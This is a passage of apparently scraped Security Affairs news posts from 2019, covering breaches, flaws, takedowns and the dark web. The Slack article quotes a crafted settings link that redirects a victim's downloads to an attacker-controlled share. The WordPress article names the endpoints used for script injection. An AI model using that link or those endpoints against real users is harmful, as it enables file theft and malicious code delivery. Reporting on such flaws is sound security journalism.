In response to the incident, Salesforce has denied all access to a hundred of cloud instances that host Pardot users, the blocked the access for any other user to the same systems, even if they were not using Pardot.

Salesforce customers have been unable to access the service since 09:56 PDT (16:56 UTC) on Friday.

“The deployment of a database script resulted in granting users broader data access than intended,” reads a note published by the company. “To protect our customers, we have blocked access to all instances that contain affected customers until we can complete the removal of the inadvertent permissions in the affected customer orgs.”

salesforce outage

Below the message published by Patrick Harris, Salesforce CTO and co-founder:

A few hours ago, Salesforce informed its users that it was able to restore access to most of its services, this means that the users experienced at least 15 hours of service disruption. Unfortunately, some organizations may still face problems, according to the latest notice issued by the CRM firm administrators will have to manually repair user account permissions.

“We have restored administrators’ access to all orgs affected by the recent permissions issue and have prepared a set of instructions for admins that may need guidance on how to manually restore user permissions. We have updated the instructions to include guidance for Field Service Lightning administrators.” states the company. “Those instructions can be found in this Known Issue article: http://sfdc.co/PermSetKI. In parallel, we are working on an automated provisioning fix to allow us to restore user permissions to where they were before the incident occurred.”

The company warns that a limited number of admins may still be experiencing issues such as logging in to their organizations or modifying permissions.

If you appreciate my effort in spreading cybersecurity awareness, please vote for Security Affairs in the section “Your Vote for the Best EU Security Tweeter”

Thank you

Pierluigi Paganini

(SecurityAffairs – Salesforce, outage)

The post Salesforce faced one of its biggest service disruption of ever appeared first on Security Affairs.

Dutch intelligence investigate alleged Huawei ‘backdoor’

Dutch intelligence services are probing Huawei for possibly spying for the Chinese government by using a “back door” in equipment of major telecoms firms.

Dutch intelligence probes Huawei for possibly spying for the Chinese government by using a “back door” in the equipment used by major telecoms firms.

Dutch intelligence shares the concerns raised by other western governments about the risks of involving the Chinese telco giant in the creation of the new 5G mobile phone infrastructure.

Since 2018, US Government has invitedd its allies to exclude Huawei equipment from critical infrastructure and 5G architectures.

According to Dutch newspaper De Volkskrant, the probe into Huawei is being led by the Dutch intelligence agency, AIVD.

The newspaper, citing intelligence sources, revealed that Huawei had alleged access to the data of customers of major telecoms firms in the country, including Vodafone, KPN and T-Mobile. In April, KPN announced a partnership with Huawei to update its 4G networks.

“The report comes at a crucial time in the Netherlands, with Dutch Prime Minister Mark Rutte expected to make an imminent decision on the extent of Huawei’s involvement in the country’s 5G infrastructure.” reported the Telegraph.

AIVD did not comment the report, its spokesman Hilbert Bredemeijer explained that the spy agency “does not comment on possible individual cases.”

Huawei Dutch intelligence

Huawei continues to refuse the accusation of cyber espionage, it also remarked that it is a private company not working for the Chinese intelligence apparatus.

“We do not respond to stories based on anonymous sources or speculation. We have been aware of a Task Force led by the NCTV (Ministry of Justice & Security) for some time to investigate the risks involved in the construction and use of 5G. That was previously announced in a letter from Minister Grapperhaus.” a Huawei spokesperson said.

“It is also known that the three major telecom parties are participating in the risk analysis of the vulnerability of 5G telecommunication networks. This involves looking at what measures are needed to minimize risks. We are in favor of taking general measures that can increase the resilience of telecommunications networks and that apply equally to all relevant parties. We look forward to the results of this report with confidence.”

The Dutch probe is part of a dispute between China and the United States over global trade and cyber espionage.

If you appreciate my effort in spreading cybersecurity awareness, please vote for Security Affairs in the section “Your Vote for the Best EU Security Tweeter”

https://www.surveymonkey.com/r/EUBloggerAwards2018

Thank you

Pierluigi Paganini

(SecurityAffairs – 5G, Dutch intelligence services)

The post Dutch intelligence investigate alleged Huawei ‘backdoor’ appeared first on Security Affairs.

Number of hacktivist attacks declined by 95 percent since 2015

According to a study conducted by IBM, the number of hacktivist attacks that caused quantifiable damage has declined by 95 percent since 2015.

Even if in Italy the cells of the popular Anonymous collective are very active, the overall number of hacktivist attacks that caused in quantifiable damage to the victim has declined by 95 percent since 2015.

Researchers analyzed data collected by IBM’s X-Force threat intelligence unit between 2015 and 2019. Collected information shows a drop in the hacktivist attacks from 35 in 2015 to only 2 attacks in 2018.

hacktivists attacks 2

However, IBM experts only collected data on hacktivist attacks that resulted in quantifiable damage.

Most of the hacktivist attacks carried out between 2015 and 2018 were attributed to Anonymous (45%), followed at a distance by Lizard Squad (9%), and DownSec and New World Hackers (4%).

hacktivists attacks

“The “IBM X-Force Threat Intelligence Index 2019” highlighted troubling trends in the cybersecurity landscape, including a rise in vulnerability reporting, cryptojacking attacks and attacks on critical infrastructure organizations.” reads a blog post published by IBM. “Yet amid all the concern, there is one threat trend that our data suggests has been on the decline: hacktivism — the subversive use of internet-connected devices and networks to promote a political or social agenda.”

The experts believe that the decline in the number of attacks carried out by hacktivists is caused by two major factors: a drop in attacks launched by Anonymous, and the intensification of the operations conducted by law enforcement that led to the arrests of hacktivists.

Since 2010, Anonymous has become one of the most active collectives of hacktivists in the world, reaching a peak of activity in early- to mid-2016,

At the time, Anonymous hit several high-profile organizations, but according to IBM the group started to decline “possibly due to an attrition of key leadership, differences of opinion and a struggle to find an ideological focus.”

X-Force data shows only eight Anonymous attacks in 2015 and 2016, and only one in 2018.

Arrests and legal warnings targeting hacktivists had an important deterrent action, according to IBM law enforcement agencies in the U.S., U.K. and Turkey have arrested at least 62 hacktivists since 2011, but the actual number could be greater.

“Three of the arrested hacktivists received sentences in 2018 and 2019, all with prison time of three years or greater, including one with a 10-year prison sentence.” continues IBM.

The alleged Anonymous member, Martin Gottesfeld, was accused of launching DDoS attacks against the two US healthcare organizations in 2014, the Boston Children’s Hospital and the Wayside Youth and Family Support Network.

In January, the hacktivist was sentenced to 121 months in prison and the judge ordered to pay nearly $443,000 to compensate the damages.

“Where are hacktivist attacks likely to go from here? We are reluctant to say that the era of hacktivism has come to an end. Acute social justice issues, greater organizational capabilities among hacktivist groups and a stronger shift to areas that lay beyond the reach of law enforcement all have the potential to dramatically change the face of hacktivism in a relatively short period of time.” concludes IBM. “More likely than not, we are experiencing a lull in hacktivist activity rather than a conclusion.”

If you appreciate my effort in spreading cybersecurity awareness, please vote for Security Affairs in the section “Your Vote for the Best EU Security Tweeter”

Thank you

Pierluigi Paganini

(SecurityAffairs – hacktivist attacks, hacking)

The post Number of hacktivist attacks declined by 95 percent since 2015 appeared first on Security Affairs.

Dozens of Linksys router models leak data useful for hackers

Dozens of Linksys router models are affected by a flaw that causes the leak of data that can be used by attackers …. and the company won’t fix it.

Security researcher Troy Mursch, Chief Research Officer of Bad Packets, discovered that over 20,000 Linksys wireless routers are leaking full historical records of every device ever connected to them.

The leaked information includes devices’ unique identifiers, names, and operating systems, clearly, these data could be abused by hackers for attacks.

According to Mursch, the root cause of the data leak is a persistent vulnerability that resides in dozens of models of Linksys routers. Unfortunately, the flaw is very easy to exploit, and it is possible.

The devices continue to leak the information even when their firewall is turned on.

The expert used the Binary Edge IoT search engine to find vulnerable devices, earlier this week he discovered 25,617 routers that were leaking a total of 756,565 unique MAC addresses.

The disclosure of the historical records of devices that have connected to a specific router exposes the users to attacks, the knowledge of MAC addresses could be abuse by APT groups in targeted attacks, like the recent supply chain attack against ASUS.

The situation could be worse if owners of the routers were using default admin credentials. The issue discovered by the expert, in fact, could be used by attackers to discover if the vulnerable routers are still using default administrative passwords.

Mursch discovered that about 4,000 of the vulnerable devices were still using the default admin credentials. The vulnerable routers have remote access enabled by default, a gift for hackers that can perform a broad range of malicious activities, such as change DNS settings and deliver malware.

Mursch reported the flaw to Linksys, but unfortunately, the company closed the issue as “Not applicable / Won’t fix.”

Mursch published the list of vulnerable devices released on Pastebin.

Linksys flaw

If you are using one of the vulnerable devices you would replace it.

If you manage a MongoDB instance follow the guidelines on “how to secure a MongoDB database” 

If you appreciate my effort in spreading cybersecurity awareness, please vote for Security Affairs in the section “Your Vote for the Best EU Security Tweeter”

Thank you

Pierluigi Paganini

(SecurityAffairs – LinkSys, Data leak)

The post Dozens of Linksys router models leak data useful for hackers appeared first on Security Affairs.

Unistellar attackers already wiped over 12,000 MongoDB databases

Unistellar attackers have already wiped roughly 12,000 unsecured MongoDB databases exposed online
over the past three.

Every time hackers deleted a MongoDB database they left a message asking the administrators to contact them to restore the data.

Unfortunately, the criminal practice of deleting MongoDB databases and request a ransom to restore data is common, experts observed several campaigns targeting unsecured archive exposed online.

In the last wave of attacks, crooks don’t request the payment of a specific ransom amount, instead, they provide an email contact to start a negotiation.

Bleeping Computer first reported the attacks and cited the expert Sanyam Jain as the person that discovered the deleted MongoDB databases.

“this person might be charging money in cryptocurrency according to the sensitiveness of the database.” explained Jain.

The expert discovered 12,564 unprotected MongoDB DBs that were wiped by an attacker tracked as Unistellar, he searched the text “hacked_by_unistellar” that the attacker left in the message.

Making the same search on Shodan experts at BleepingComputer found a smaller number, 7,656 databases, while doing the same search I found 8.133 compromised installs exposed online.
It is likely the attacker has automated its attacks chain due to the lange number of MongoDB databases deleted by Unistellar.

Unistellar MongoDB wiped

Jain first discovered the attacks on April 24, the note left by the Unistellar attacker reads “Restore ? Contact : unistellar@yandex.com

The attacker used two email addresses in these attacks, unistellar@hotmail.com or unistellar@yandex.com.

According to Jain, Unistellar creates restore points to restore the databases after the victims have paid the ransom.

If you manage a MongoDB instance follow the guidelines on “how to secure a MongoDB database” 

If you appreciate my effort in spreading cybersecurity awareness, please vote for Security Affairs in the section “Your Vote for the Best EU Security Tweeter”

Thank you

Pierluigi Paganini

(SecurityAffairs – Unistellar attacks, MongoBD)

The post Unistellar attackers already wiped over 12,000 MongoDB databases appeared first on Security Affairs.

Facebook banned Archimedes Group, misinformation made in Israel

A new political misinformation campaign was uncovered and blocked by Facebook, this time it was not operated by Russia but Israel’s Archimedes Group

Facebook uncovered and blocked a misinformation campaign powered by Israel’ Archimedes Group, the corporation used fake accounts to manipulated political campaigns.

According to Facebook, the Archimedes Group used hundreds of pages, accounts, and groups in the attempt to influence the public sentiment on political discussions.

The misinformation focused on specific countries in Africa (Nigeria, Senegal, Togo, Angola, Niger, and Tunisia), Latin America and Southeast Asia. The operators behind this campaign posed themselves as local people and organizations to fuel the debate on specific political events.

“Today we removed 265 Facebook and Instagram accounts, Facebook Pages, Groups and events involved in coordinated inauthentic behavior. This activity originated in Israel and focused on Nigeria, Senegal, Togo, Angola, Niger and Tunisia along with some activity in Latin America and Southeast Asia.” wrote Nathaniel Gleicher, Head of cybersecurity Policy at Facebook. “The people behind this network used fake accounts to run Pages, disseminate their content and artificially increase engagement.”

Facebook banned Archimedes Group and all of its subsidiaries from its social media platforms.

Facebook shared some interesting details about the efforts of the corporations in spreading fake news to change the perception of the reality:

  • Presence on Facebook and Instagram: 65 Facebook accounts, 161 Pages, 23 Groups, 12 events and four Instagram accounts.
  • Followers: About 2.8 million accounts followed one or more of these Pages, about 5,500accounts joined at least one of these Groups and around 920 people followed one or more of these Instagram accounts.
  • Advertising: Around $812,000 in spending for ads on Facebook paid for in Brazilian reals, Israeli shekel, and US dollars. The first ad ran in December 2012 and the most recent ad ran in April 2019.
  • Events: Nine events were hosted by these Pages. The first was scheduled for October 2017 and the most recent was scheduled for May 2019. Up to 2,900 people expressed interest in at least one of these events, and a portion of their accounts were previously identified and disabled as fake. We cannot confirm whether any of these events actually occurred.

Facebook provided an example of the type of content that was removed, the following image is related to Martin Fayulu, leader of the Engagement for Citizenship and Development party in the Democratic Republic of the Congo.

screenshot-2019-05-17-at-07-17-23.png

Archimedes Group invested a total of $812,000 on Facebook ads, these figures could give you an idea about the strategic importance of social networks in misinformation campaigns.

“It has repeatedly violated our misrepresentation and other policies, including by engaging in coordinated inauthentic behavior,” Facebook says. “This organization and all its subsidiaries are now banned from Facebook, and it has been issued a cease and desist letter.”

Now the question is, who paid this campaign?

If you appreciate my effort in spreading cybersecurity awareness, please vote for Security Affairs in the section “Your Vote for the Best EU Security Tweeter”

https://www.surveymonkey.com/r/EUBloggerAwards2018

I’m one of the finalists thanks to your support

Thank you

Pierluigi

Pierluigi Paganini

(SecurityAffairs – Facebook, Archimedes Group

The post Facebook banned Archimedes Group, misinformation made in Israel appeared first on Security Affairs.

Chinese state-sponsored hackers breached TeamViewer in 2016

The German newspaper Der Spiegel revealed that the software company behind TeamViewer was compromised in 2016 by Chinese hackers.

China-linked hackers breached German software company behind TeamViewer in 2016, this news was reported by the German newspaper Der Spiegel

teamviewer

According to the media outlet, Chinese state-sponsored hackers used the
Winnti trojan malware to infect the systems of the Company.

The Winnti group was first spotted by Kaspersky in 2013, according to the researchers the gang has been active since 2007.

The gang is financially-motivated and was mostly involved in cyber espionage campaigns.  The hackers were known for targeting companies in the online gaming industry, the majority of the victims is located in Southeast Asia.

The Winnti cyberespionage group is known for its ability in targeting supply chains of legitimate software to spread malware.

According to the company, it was targeted by the hackers in autumn 2016, when its experts detected suspicious activities were quickly blocked them to prevent major damages.

TeamViewer spokesperson revealed that the company investigated the attempts of intrusion, but did not find any evidence of exposure for customer data and sensitive data.

Der Spiegel pointed out that TeamViewer did not disclose the security breach to the public.

“In autumn 2016, TeamViewer was target of a cyber-attack. Our systems detected the suspicious activities in time to prevent any major damage. An expert team of internal and external cyber security researchers, working together closely with the responsible authorities, successfully fended off the attack and with all available means of IT forensics found no evidence that customer data or other sensitive information had been stolen, that customer computer systems had been infected or that the TeamViewer source code had been manipulated, stolen or misused in any other way.” said company spokesman.

“Out of an abundance of caution, TeamViewer conducted a comprehensive audit of its security architecture and IT infrastructure subsequently and further strengthened it with appropriate measures.”

At the time the company published a statement to exclude it was breached by hackers:

Göppingen/Germany, May 23, 2016. A recent article warns, “TeamViewer users have had their bank accounts emptied by hackers gaining full-system access”. TeamViewer is appalled by any criminal activity; however, the source of the problem, according to our research, is careless use, not a potential security breach on TeamViewer’s side.” wrote the company.

If you appreciate my effort in spreading cybersecurity awareness, please vote for Security Affairs in the section “Your Vote for the Best EU Security Tweeter”

https://www.surveymonkey.com/r/EUBloggerAwards2018

I’m one of the finalists thanks to your support

https://www.surveymonkey.com/r/secbloggerwards2016

Thank you

Pierluigi

Pierluigi Paganini

(SecurityAffairs – TeamViewer, hacking)

The post Chinese state-sponsored hackers breached TeamViewer in 2016 appeared first on Security Affairs.

A flaw in Slack could allow hackers to steal, manipulate downloaded files

A recently patched flaw in the Slack desktop application for Windows can be exploited by attackers to steal and manipulate a targeted user’s downloaded files.

Slack is a cloud-based set of proprietary team collaboration tools and services,

Security researcher David Wells from Tenable discovered a critical flaw in version 3.3.7 of the Slack desktop app that could be exploited to steal and manipulate a targeted user’s downloaded files.

The issue is classified as a download hijacking vulnerability that can be triggered by tricking a user into clicking on a specially crafted link pasted into a Slack channel.

Slack addressed the flaw with the release of version 3.4.0.

Wells discovered that that is it possible to use slack:// links to change change Slack app settings if clicked, including the
PrefSSBFileDownloadPath setting that specifies the location where a user’s files are downloaded. An attacker could use a specially crafted link that when clicked, changes the targeted user’s download destination to a path specified by the attacker, for example, a remote SMB share.

“Crafting a link like “slack://settings/?update={‘PrefSSBFileDownloadPath’:’<pathHere>’}” would change the default download location if clicked (until manually changed back).” reads a blog post published by the expert. “The links however, cannot contain certain characters, as Slack filters them out. One of these characters is the “:” (colon) which means we can’t actually supply a path with drive root. An SMB share, however, completely bypassed this sanitation as there is no root drive needed.”

Slack download

Wells also discovered that an attacker could manipulate the downloaded file stored in the location they set up.

“Furthermore, we could have easily manipulated the download item when we control the share it’s uploaded to, meaning the Slack user that opens/executes the downloaded file will actually instead be interacting with our modified document/script/etc off the remote SMB share, the options from there on are endless.”

An attacker can inject malware into an Office file downloaded by the victim.

The links devised by the expert can be pasted to a Slack channel or a private conversation to which the attacker has access.

But, is it possible to paste the link to Slack channels where attackers are not part of?

The expert discovered that an unauthenticated attacker can change the location of downloaded files using RSS feeds. Slack channels, in fact. can subscribe to RSS feeds to populate a channel with site updates which can contain links. 

In this case, the hacker has to trick the victim into clicking on a specially crafted RSS feed link posted online. The download location can be changed even if the attacker has not access to the victim’s Slack workspace.

Lets consider an example with reddit.com, here I could make a post to a very popular Reddit community that Slack users around the world are subscribed to (in this test case however, I chose a private one I owned). I will drop an http link (because slack:// links are not allowed to be hyperlinked on Reddit) that will redirect to our malicious slack:// link and change settings when clicked.” adds Wells.

“While less effective, these hyperlink attacks could be done without Slack channel authentication, via external .rss feeds or other content pulled into a Slack channel from an external source that may contain attacker-crafted hyperlinks.” Tenable explained.

“This attack could be launched by someone outside of the organization but there are variables that might reduce the chances of success, like knowing which .rss feeds the target Slack subscribes to,”

The flaw has been classified as “medium severity” because it required user interaction. Slack awarded $500 the researcher under its bug bounty program.

Users should check that they are running the latest version.

Pierluigi Paganini

(SecurityAffairs – Slack, hacking)

The post A flaw in Slack could allow hackers to steal, manipulate downloaded files appeared first on Security Affairs.

Cisco addressed a critical flaw in networks management tool Prime Infrastructure

Cisco had issued security updates to address 57 security flaw, including three flaws in networks management tool Prime Infrastructure.

One of the flaws addressed by Cisco in the Prime Infrastructure management tool could be exploited by an unauthenticated attacker to execute arbitrary code with root privileges on PI devices.

“Multiple vulnerabilities in the web-based management interface of Cisco Prime Infrastructure (PI) and Cisco Evolved Programmable Network (EPN) Manager could allow a remote attacker to gain the ability to execute arbitrary code with elevated privileges on the underlying operating system.” reads the advisory published by Cisco.

“One of these issues, CVE-2019-1821, can be exploited by an unauthenticated attacker that has network access to the affected administrative interface.”

The remaining two issues, tracked as CVE-2019-1822 and CVE-2019-1823, could be exploited by an attacker that has valid credentials to authenticate to the impacted administrative interface.

The flaws affect Cisco Prime Infrastructure Software releases prior to 3.4.1, 3.5, and 3.6, and EPN Manager Releases prior to 3.0.1.

The vulnerabilities were discovered by Steven Seeley of Source Incite.

“These vulnerabilities exist because the software improperly validates user-supplied input,” continues the advisory. “An attacker could exploit these vulnerabilities by uploading a malicious file to the administrative web interface. A successful exploit could allow the attacker to execute code with root-level privileges on the underlying operating system.”

Cisco PSIRT experts are aware of any attacks exploiting the flaws in the wild.

Cisco Prime Infrastructure

A few days ago, Cisco fixed the Thrangrycat, a vulnerability tracked as CVE-2019-1649 that affects multiple Cisco products supporting the Trust Anchor module (TAm). The issue could be exploited by an attacker to fully bypass Cisco’s Trust Anchor module (TAm) via Field Programmable Gate Array (FPGA) bitstream manipulation.

Pierluigi Paganini

(SecurityAffairs – Cisco Prime infrastructure, hacking)

The post Cisco addressed a critical flaw in networks management tool Prime Infrastructure appeared first on Security Affairs.

Stack Overflow Q&A platform announced a data breach

The popular question-and-answer platform for programmers Stack Overflow announced on Thursday that is has suffered a data breach.

The news of a data breach makes the headlines, this time the victim is the popular question-and-answer platform for programmers Stack Overflow.

The company announced on Thursday that it has discovered unauthorized access to its production systems over the weekend.

The company immediately launched an investigation. At this time the company did not share technical details about the intrusion, it only revealed that has found no evidence that customer or user data was compromised.

“Over the weekend, there was an attack on Stack Overflow. We have confirmed that some level of production access was gained on May 11.” reads a data breach notification published by Mary Ferguson, VP of Engineering at Stack Overflow. “We discovered and investigated the extent of the access and are addressing all known vulnerabilities,”

Stack Overflow has more than 10 million registered users and it has over 50 million unique visitors every month. The Q&A platform is the most important website of the Stack Exchange Network.

Stack Overflow data breach

In December 2018, another popular Q&A platform, Quora, revealed to have suffered a data breach.

Back in December, the popular Q&A website Quora revealed that has suffered a data breach.

Unknown hackers breached its systems and accessed 100 million user data, exposed data included names, email addresses and hashed password.

Pierluigi Paganini

(SecurityAffairs – data breach, hacking)

The post Stack Overflow Q&A platform announced a data breach appeared first on Security Affairs.

XSS flaw in WordPress Live Chat Plugin lets attackers compromise WP sites

A vulnerability in the Live Chat Support plugin for WordPress could be exploited by attackers to inject malicious scripts in websites using it

Researchers at Sucuri have discovered a stored/persistent cross-site scripting (XSS) vulnerability in the WP Live Chat Support plugin for WordPress.

The flaw could be exploited by remote, unauthenticated attackers to inject malicious scripts in websites running WordPress CMS and using
Live Chat Support plugin. The issue could be exploited by a remote attacker that does not have an account on the affected website.

It has been estimated that the plugin currently has over 60,000 installs, it implements a chat solution for customer engagement and conversion.

Versions of the plugin previous to 8.0.27 are vulnerable to stored/persistent XSS.

Experts pointed out that the attack to trigger this issue can be automated to hit a broad range of victims.

An XSS vulnerability could allow hackers to inject malicious code in websites and compromise visitors’ accounts or expose them to modified page content. A cross-site scripting vulnerability may be used by attackers to bypass access controls such as the same-origin policy. 

An XSS is persistent when the malicious code is added to a section that is stored on the server. Every time the browser of a visitor loads the page, it parses the malicious code and executes the malicious code.

In order to exploit the vulnerability, it is possible to use an unprotected admin_init hook as attack vector:

Live Chat Support Plugin

Experts discovered that the function wplc_head_basic lack of proper privilege checks while updates the plugin settings.

Live Chat Support Plugin 2

“It then executes an action hook with even more critical settings ” reads the advisory published by Sucuri. ” Since “admin_init” hooks can be called visiting either /wp-admin/admin-post.php or /wp-admin/admin-ajax.php, an unauthenticated attacker could use these endpoints to arbitrarily update the option  “wplc_custom_js”. “

The content of the option is added to every page that loads the live chat support, allowing attackers to inject malicious JavaScript code on multiple pages.

To secure your WordPress install update the WP Live Chat Support pluign to version 8.0.27

Below the timeline of the flaw:

  • April 30, 2019: Initial contact attempt.
  • May 15, 2019: Patch is live.

Pierluigi Paganini

(SecurityAffairs – Live Chat Support, Hacking)


The post XSS flaw in WordPress Live Chat Plugin lets attackers compromise WP sites appeared first on Security Affairs.

Past, present, and future of the Dark Web

Which is the difference between the Deep Web and Dark Web? Considerations about past, present, and future of the Dark Web.

These are intense days for the Dark Web. Operations conducted by law enforcement agencies lad to the arrests of many individuals and the closure of the most popular Black Marketplaces, many of which remained alive over the years.

Operators behind the principal black markets made a lot of money, let’s think of managers of the Wall Street Market and Valhalla recently seized by feds. These are historic points of aggregations where it was possible to buy drugs, weapons, and any kind of hacking tools.

The icing on the cake was a US research that decreed how the size of the Dark Web was significantly lower than previously thought. This isn’t a novelty for the experts that are studying dark web and its evolution.

Unfortunately there is too much confusion between the term deep web and dark web, many videos on YouTube channels provide wrong information. Misinterpretation, superficiality, some times simple profits, these are the root cause of the confusion. This misinformation is extremely dangerous for kids, first consumers of videos published on the principal social media platform. Some videos show that is very simple to buy drugs securely or explain how to hack a website. Describing these phenomena, some journalists have been labeled “as experts on the dark web”.

The Dark Web is just a portion of the Deep Web, its access is quite simple and doesn’t require any specific technological skill. It is very easy to access to the Tor network or browse content on other anonymizing networks like I2P.

I started this research on September 2016, when I started writing my my book, “The Prison of the Humanity – from the deep web to 4.0 the new digital prisons”.

THE ICEBERG

Dark Web 1

An Iceberg has always been used as a visual representation of the Internet world. The visible peak, which represents the smallest part of the iceberg, that many have mistakenly associated with the clear web: is the part reachable by search engines.

Even a child could easily wonder: how can billions of sites visible to internet users represent 5% of the internet itself?

Exactly, how?

The Deep Web is composed of the content of the www that is not indexed by search engines. Try to imagine the site of a Provider that offers voice or connectivity services to millions of people, families and companies. Its files are not indexable by search engines. Try to think of a banking site with millions of account holders who keep the history of transactions, deposits, investments for years and years, without obviously being accessible to the entire web population.

Let’s also include all information by the IOT devices that are connected online by that that cannot be accessed for obvious reasons.

Well, not you can have an idea about the dimension of the deep web.

THE DARK WEB

What is the Dark Web? It is a non-indexed subset of the Deep Web. Accessible through TOR and other software, it has a size that is incalculable if we use imagination. In fact, there could be many .onion sites, an extension of the domains inside the TOR network, which are not indicated by the Hidden Wiki, a sort of Wikipedia of onion Links. Furthermore, each website can have sublevels that could reach infinity.

But here we talk about legends. We go into the merits of my research which is based on the facts and experience of three years of journalistic navigation in the Dark Web where not only do you have browsed dozens of Directories, but you have visited at least 100,000 sites.

My search is based on 100,000 sites that I have personally visited and that can be easily classified into very few categories that I will explain to you with brief descriptions:

Information:

The spirit of the Dark Web includes precisely the freedom of expression with portals that give “uncomfortable” or “alternative” news in countries where there is censorship. There are many sites in multiple languages ​​that refer to ideological and collective movements, due to the greater number of Anarchist derivations, but there are also movements that promote the defense of online privacy. So there is so much counter-information and the most obvious example that I always carry forward is the version of the Bible translated into the languages ​​of the countries where it is strictly prohibited.

Black Markets:

They are the heart of the Dark Web in economic terms, needless to say that it is impossible to count them verify their reliability, but they are certainly the points of aggregation for several million users and unscrupulous sellers that offer drugs, weapons, medicines requiring medical prescription, bank credential and personal data of unsuspecting users, steroids and hacking guides.

Empty or non-functional web pages:

Empty pages, typical errors displaying code 404 that feed the list of the .onion domains in the directories.

Scam

There are many sites that promise the same services as Black Markets, including hitman services, hacking services, money laundering services… but they are only services operated by scammers.

Directories – Search Engines

There are many directories that offer the same links, Hidden Wiki services that offer a guide to the principal links in the Dark Web, but it is clear that the hidden Wiki is one and the original not only reports the links to the sites but also provides an “obscure and forbidden” encyclopedia service similar to the best known Wikipedia. The presence of search engines that are similar to Google are also frequent, but they do not always find the result that they hope for.

Child pornography-pornography-violence on animals-GORE

There are many pornographic sites on the clear web, but pornography in the dark web takes on gruesome tones. Violence, child abuse, snuff movies and extreme sex are very common. The sites that belong to these categories are divided into different types: chat rooms, traditional websites or service containers. The chats are usually open and there is a remarkable exchange of multimedia files for free. Then there are the forums that need registration, they offer audio/video content or images, and also provide suggestions on how to kill people or how to eat them in ritual cannibalism. Furthermore, there are many child pornography sites on the dark web that point to the largest online sharing platforms, such as Satoshi box or Megaupload, where it is possible to pay to download packages of illegal content.

Websites – Forums

They are normal websites that deal with different topics, including forums that represent meeting points for users that discuss legal and non-legal issues. There are many blogs that for the greater part deal with issues of cybersecurity and the rights of the digital population in terms of consumer protection and privacy.

Honeypots

Consider sites belonging to the above categories, in many cases they are traps set up by the law enforcement agencies to attempt to identify criminals. The dark web is full of honeypots.

CONCLUSIONS

Let’s conclude with some statistic on the composition of the Dark Web:

  • Not Working: 45%
  • Scam: 44%
  • Websites – Forums: 6%
  • Child pornography – Gore: 4%
  • Directories – search engines: 0.5%
  • Information: 0.3%
  • Black Markets: 0.2%

At this time, it is not possible to determine the exact number of Black Markets, anyway, it is really limited. Terrorism is an irrelevant phenomenon in terms of propaganda. It is also impossible to determine the diffusion of honeypots.

The real question is not how big is the Dark Web, but what will happen after the operations conducted law enforcement?

Who will be its users? Will Black Markets still exist?

Or is the Dark Web itself a honeypot for criminals, anarchists, terrorists and. pedophiles?

These doubts are legitimate, given that the military origins of the most popular anonymizing network.

About the Author: Livio Varriale

Pierluigi Paganini

(SecurityAffairs – Dark Web, crime)



The post Past, present, and future of the Dark Web appeared first on Security Affairs.

A joint operation by international police dismantled GozNym gang

A joint effort by international law enforcement agencies from 6 different countries has dismantled the crime gang behind the GozNym banking malware.

GozNym banking malware is considered one of the most dangerous threats to the banking industry, experts estimated it allowed to steal nearly $100 million from over 41,000 victims across the globe for years.

“An unprecedented, international law enforcement operation has dismantled a complex, globally operating and organised cybercrime network.” reads the press release published by the Europol. “The criminal network used GozNym malware in an attempt to steal an estimated $100 million from more than 41 000 victims, primarily businesses and their financial institutions.”

GozNym

The GozNym banking malware was first spotted in April 2015 by researchers from the  IBM X-Force Research, it combines the best features of Gozi ISFB and Nymaim malware.

The GozNym has been seen targeting banking institutions, credit unions, and retail banks. Among the victims of the GozNym Trojan there are 24 financial institutions in North America and organizations in Europe, including a Polish webmail service providers, investment banking and consumer accounts at 17 banks in Poland and one bank in Portugal.

Now the Europol announced the unprecedented, international law enforcement operation that allowed to dismantled the complex, globally operating and organised cybercrime network.

Europol with the help of law enforcement agencies from Bulgaria, Germany, Georgia, Moldova, Ukraine, and the United States identified and 0 individuals alleged members of the GozNym network.

5 defendants were arrested during several coordinated searches conducted in Bulgaria, Georgia, Moldova, and Ukraine, the remaining ones are Russians citizens and are still on the run, including the expert who developed the banking malware.

The cybercrime organization has been described by the Europol as a highly specialised and international criminal network.

One of the members that encrypted GozNym malware to avoid detection by security solutions, was arrested and is being prosecuted in the Republic of Moldova.

Operators behind the GozNym malware used the Avalanche network to spread the malware.

“Bulletproof hosting services were provided to the GozNym criminal network by an administrator of the “Avalanche” network.  The Avalanche network provided services to more than 200 cybercriminals, and hosted more than twenty different malware campaigns, including GozNym.” continues the press release published by Europol. Through the coordinated efforts being announced today, this alleged cybercriminal is now facing prosecution in Ukraine for his role in providing bulletproof hosting services to the GozNym criminal network.  The prosecution will be conducted by the Prosecutor General’s Office of Ukraine and the National Police of Ukraine.

The members of the gang used banking malware to infect victims’ computers and steal their online banking credentials.

“A criminal Indictment returned by a federal grand jury in Pittsburgh, USA charges ten members of the GozNym criminal network with conspiracy to commit the following:

  • infecting victims’ computers with GozNym malware designed to capture victims’ online banking login credentials;
  • using the captured login credentials to fraudulently gain unauthorised access to victims’ online bank accounts;
  • stealing money from victims’ bank accounts and laundering those funds using U.S. and foreign beneficiary bank accounts controlled by the defendants.

The defendants are well known on Russian underground, they advertised their specialized technical skills and services in Russian-speaking online criminal forums. Through these forums the leader of the GozNym network recruited them.

“The leader of the GozNym criminal network, along with his technical assistant, are being prosecuted in Georgia by the Prosecutor’s Office of Georgia and the Ministry of Internal Affairs of Georgia.” continues the Europol.

Below the advisory published by the FBI:

GOZNYM

Pierluigi Paganini

(SecurityAffairs – GozNym, malware)

The post A joint operation by international police dismantled GozNym gang appeared first on Security Affairs.

Microsoft renewed its Attack Surface Analyzer, version 2.0 is online

Microsoft has renewed its Attack Surface Analyzer tool to take advantage of modern, cross-platform technologies.

The first version of the Attack Surface Analyzer 1.0 was released back in 2012, it aims at detecting and changes that occur in the Windows operating systems during the installation of third-party applications. 

The Analyzer has been released on GitHub, it has been developed using .NET Core and Electron. The choice to use these two cross-platform technologies allows running on macOS and Linux, and of course Windows.

“Attack Surface Analyzer is a Microsoft-developed open source security tool that analyzes the attack surface of a target system and reports on potential security vulnerabilities introduced during the installation of software or system misconfiguration.” reads the README file published by Microsoft.

“Attack Surface Analyzer 2.0 replaces the original Attack Surface Analzyer tool, released publicly in 2012.”

Attack Surface Analyzer

Users of Attack Surface Analyzer could determine changes to the system attack surface introduced when a software is installed and evaluate risk presented when third-party software is installed.

The tool is able to detect any changes to OS components, including file system (static snapshot and live monitoring available), user accounts, services, network ports, certificates, registry (Windows only).

“The core feature of Attack Surface Analyzer is the ability to “diff” an operating system’s security configuration, before and after a software component is installed.” continues Microsoft. “This is important because most installation processes require elevated privileges, and once granted, can lead to unintended system configuration changes.”

